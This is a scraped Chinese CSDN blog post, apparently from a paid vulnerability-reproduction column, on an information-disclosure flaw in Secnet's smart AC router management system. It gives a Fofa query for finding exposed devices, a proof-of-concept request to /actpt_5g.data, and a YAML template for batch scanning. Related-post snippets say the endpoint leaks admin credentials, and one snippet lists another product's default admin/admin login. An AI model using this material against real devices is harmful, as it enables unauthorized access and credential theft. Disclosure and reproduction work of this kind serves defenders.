安网智能AC管理系统信息漏洞（含批量验证poc）

今天晚上早睡觉

已于 2024-04-18 10:01:57 修改

阅读量230

点赞数

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签： web安全

于 2024-04-18 10:01:38 首次发布

本文链接：https://blog.youkuaiyun.com/weixin_43567873/article/details/137908643

漏洞复现专栏收录该内容

363 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了安网物联智慧酒店解决方案中的智能AC系统存在的信息泄漏漏洞。通过Fofa进行搜索定位，详细阐述了漏洞复现的过程，并涉及YAML相关问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1.简介

安网物联全新推出的智慧酒店解决方案,涵盖了多项智慧酒店应用系统。其中智能AC存在信息泄漏漏洞。

2.Fofa

title="安网-智能路由系统" || header="HTTPD_ac 1.0"

3.漏洞复现

POC:
http://1.1.1.1/actpt_5g.data

4.YAML

params: []
name: 安网智能AC管理系统信息漏洞
set: {}
rules: []
groups:
  rules:
  - method: GET
    path: /actpt_5g.data
    headers: {}
    body: ""

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

今天晚上早睡觉

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

订阅专栏

广州安*通信技术有限公司secnet安网智能AC管理系统信息泄露漏洞复现 CNVD-2022-86158

afei001

09-15

468

广州安*通信技术有限公司（简称“*网通信”）是一家专注于网络通信设备的研发、生产、销售及服务，并为用户提供网络安全、路由器、交换机、防火墙、无线AP覆盖等网络产品和业务解决方案的服务商。 secnet安网智能AC管理系统存在敏感信息泄露漏洞，攻击者可利用该漏洞登录系统获取敏感信息。

某讯D-Link AC集中管理平台未授权访问漏洞复现 CNVD-2023-19479

afei001

10-22

478

某讯电子设备（上海）有限公司于2002年8月13日在自贸区市场监督管理局登记成立。公司经营范围包括区内以路由器、网络卡、集线器、交换器、转换器等。 D-Link AC集中管理平台存在未授权访问漏洞，攻击者可利用该漏洞获取路由AC后台相关敏感信息。

参与评论您还未登录，请先登录后发表或查看评论

智能AC管理系统信息泄露漏洞

一个努力学习网安的小牛马

09-19

541

本文章仅供学习与交流，请勿用于非法用途，均由使用者本人负责，文章作者不为此承担任何责任。智能AC管理系统是一个控制管理系统因存在未授权访问导致信息泄露。

智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞

nnn2188185的博客

09-19

241

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发智能AC管理系统HTTPD-AC 1.0服务。

Secnet安网智能AC管理系统 actpt_5g接口敏感信息泄露复现 [附POC]

薛定谔嘚喵博客

12-13

368

Secnet安网智能AC管理系统 actpt_5g 接口存在信息泄露漏洞，可获取用户密码信息。

锐捷交换机WEB管理系统EXCU_SHELL信息泄露漏洞（含批量验证poc）

weixin_43567873的博客

04-15

553

锐捷交换机WEB管理系统EXCU_SHELL信息泄露漏洞（含批量验证poc）

深信服应用交付管理系统 login 远程命令执行漏洞（含批量验证poc）

weixin_43567873的博客

04-15

908

深信服应用交付管理系统 login 远程命令执行漏洞（含批量验证poc）

Secnet-智能路由系统 actpt_5g.data 信息泄露漏洞复现

0xSec

05-10

839

Secnet-智能路由系统actpt_5g.data 接口存在信息泄露漏洞，未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据，导致系统后台权限失控，处于极不安全状态。

安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]

薛定谔嘚喵博客

11-29

621

安网智能AC管理系统actpt_5g.data存在信息漏洞，攻击者可利用该漏洞获取敏感信息。攻击者可利用该漏洞获取AC智能路由系统WEB登录账号密码，登录AC智能路由系统获取WEB管理员权限，从而造成敏感信息泄露。

centos 下安装apache httpd

acweilisky0825的专栏

10-10

653

安装apache可能需要几个包 apr 、apr-util 、

httpd的编译安装与配置

mushuangpanny的博客

04-17

1320

httpd的编译安装与配置文章目录httpd的编译安装与配置1. apache的编译安装1.1 apr,apr-util,http网址1.2 下载并解压apr,apr-util,http1.3 编译apr1.3.1 预编译apr1.3.2 安装apr1.4 编译apr-util1.4.1 预编译apr-util1.4.2 安装apr-util1.5 安装httpd1.5.1 预编译httpd1.5.2 安装httpd1.6 安装完成后设置环境变量，头文件，和man文档1.6.1查看是否有相关的环境变量，

actcms网站管理系统漏洞0day

fengling132的专栏

06-05

2553

漏洞版本：actcms3.0以下版本默认后台路径：admin/ 默认数据库：App_Data/DataBase.mdb 默认账户：admin 默认密码: admin 利用点：FCK编译器漏洞界面: admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmi

IP证书在网络安全中的作用

qwerdfwc_的博客

06-24

312

IP证书（IP SSL证书）是SSL/TLS证书的一种，与传统的域名SSL证书不同，它直接绑定到服务器的IP地址而非域名，在网络安全中发挥着多方面的重要作用，以下是详细介绍：证书申请通道：永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL

【网络安全】DNS 域原理、危害及防御

anquan2233的博客

06-23

871

关于 DNS 的原理，这里不在做说明，你只需要知道他是 53 UDP 端口即可，以及 Wireshark 走的协议是什么样的。

AWK在网络安全中的高效应用：从日志分析到威胁狩猎

Liu_Bruce的博客

06-19

1192

作为网络安全工程师，我们经常需要从海量日志中快速定位关键信息。虽然Python等语言功能更强大，但在处理GB级文本数据时，AWK往往能提供**更即时的解决方案**。本文将分享经过实战检验的AWK技巧，帮助您： - 将日志分析效率提升3倍以上 - 构建轻量级实时监控方案 - 掌握在受限环境下的应急响应技巧

【网络安全】从IP头部看网络通信：IPv4、IPv6与抓包工具 Wireshark 实战

最新发布

A Little Bean

06-24

649

IP（Internet Protocol，互联网协议）是互联网通信的基石。它负责将数据包从源地址发送到目标地址。IP 协议规定了数据包的格式和路由方式，是实现不同设备之间通信的“邮递系统”。IPv4IPv6它们的核心区别除了地址长度外，也体现在头部结构的不同设计上。

2025湖北省职业院校技能大赛信息安全管理与评估样题

Geek极安云科-致力于网络安全事业

06-24

447

而 RIP v2 无此限制。3 根据网络拓扑图所示，按照 IP 地址参数表，对 AC 的各接口 IP 地址进行配置。4 根据网络拓扑图所示，按照 IP 地址参数表，对 BC 的名称、各接口 IP 地址进行配。1 根据网络拓扑图所示，按照 IP 地址参数表，对 FW 的名称、各接口 IP 地址进行。2 根据网络拓扑图所示，按照 IP 地址参数表，对 SW 的名称进行配置，创建 VLAN。5 根据网络拓扑图所示，按照 IP 地址规划表，对 WEB 应用防火墙的名称、各接口。

最高网络安全标准，追觅扫地机获UL Solutions钻石级安全认证

weixin_43735236的博客

06-19

378

以全球领先的安全隐私标准及全球领先的测试方法，建立起安全基线，不断为消费者打造更安全可靠的智能终端产品。此次追觅扫地机获得钻石级认证，意味着其在设备端的安全防护，应用层的数据加密，云服务数据存储的安全管理的通讯链路体系均通过了极为严苛的审核与验证。日前，追觅X50系列扫地机获得全球应用安全科学专家 UL Solutions 颁发的「UL Solutions钻石级网络安全验证证书」，这一认证意味着追觅扫地机在网络安全领域满足了极为严苛的国际标准，为用户的数据安全与隐私保护筑起了可靠防线。

打破网络安全孤岛：实现防御数据协作

Elastic 中国社区官方博客

06-24

621

摘要：现代网络战场面临数据孤岛挑战，65%的公共部门在实时数据应用上存在困难。Elastic提出数据网格解决方案，通过跨集群搜索技术实现分布式数据协作，无需集中存储敏感数据。该方法基于四大原则：领域所有权、数据产品化、自助平台和联合治理，可提升90%运维效率，将威胁响应从数天缩短至分钟。为国防部门提供安全、高效的互操作性平台，在尊重数据主权的同时增强决策优势。典型实施周期仅6个月即见效。